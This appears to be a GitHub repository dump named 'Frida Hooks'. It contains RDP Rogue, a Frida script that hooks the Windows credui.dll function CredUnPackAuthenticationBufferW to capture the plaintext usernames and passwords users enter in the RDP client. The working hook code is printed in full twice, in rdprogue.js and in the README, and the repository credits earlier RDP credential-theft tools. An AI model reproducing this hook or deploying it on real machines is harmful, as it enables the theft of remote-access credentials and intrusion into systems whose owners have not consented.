```
├── RDP_Rogue
│   ├── poc.png
│   ├── rdprogue.js
│   └── README.md
└── README.md
```

--------------------------------------------------------------------------------
/RDP_Rogue/poc.png:
--------------------------------------------------------------------------------

https://raw.githubusercontent.com/Agent00049/Frida-Hooks/master/RDP_Rogue/poc.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# Frida Hooks

- RDP Rogue: A Frida hook to retrieve RDP credentials, based on [@FuzzySec](https://twitter.com/FuzzySec)'s [RemoteViewing](https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing) project

--------------------------------------------------------------------------------
/RDP_Rogue/rdprogue.js:
--------------------------------------------------------------------------------

```js
console.log('works!');
const CredUnPackAuthentication = Module.getExportByName('credui.dll','CredUnPackAuthenticationBufferW');

Interceptor.attach(CredUnPackAuthentication,{
    onEnter: function (args){
        console.log('Getting username and password pointers');
        this.ptr_user=args[3];
        this.ptr_pass=args[7];

    },
    onLeave: function (retval) {
        console.log('Post-Call Values');
        console.log(Memory.readUtf16String(this.ptr_user)+':'+Memory.readUtf16String(this.ptr_pass));
    }
});
```

--------------------------------------------------------------------------------
/RDP_Rogue/README.md:
--------------------------------------------------------------------------------

# RDP Rogue

A quick-and-dirty Frida hook to retrieve RDP credentials, based on [FuzzySec's](https://twitter.com/FuzzySec) [RemoteViewing](https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing) and [@0x09AL](https://twitter.com/0x09AL)'s [RDP Thief](https://www.mdsec.co.uk/2019/11/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients/) projects.

```js
console.log('works!');
const CredUnPackAuthentication = Module.getExportByName('credui.dll','CredUnPackAuthenticationBufferW');

Interceptor.attach(CredUnPackAuthentication,{
    onEnter: function (args){
        console.log('Getting username and password pointers');
        this.ptr_user=args[3];
        this.ptr_pass=args[7];

    },
    onLeave: function (retval) {
        console.log('Post-Call Values');
        console.log(Memory.readUtf16String(this.ptr_user)+':'+Memory.readUtf16String(this.ptr_pass));
    }
});
```

![](./poc.png)

### References

[RDP Thief](https://www.mdsec.co.uk/2019/11/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients/)

[RemoteViewing](https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing)

--------------------------------------------------------------------------------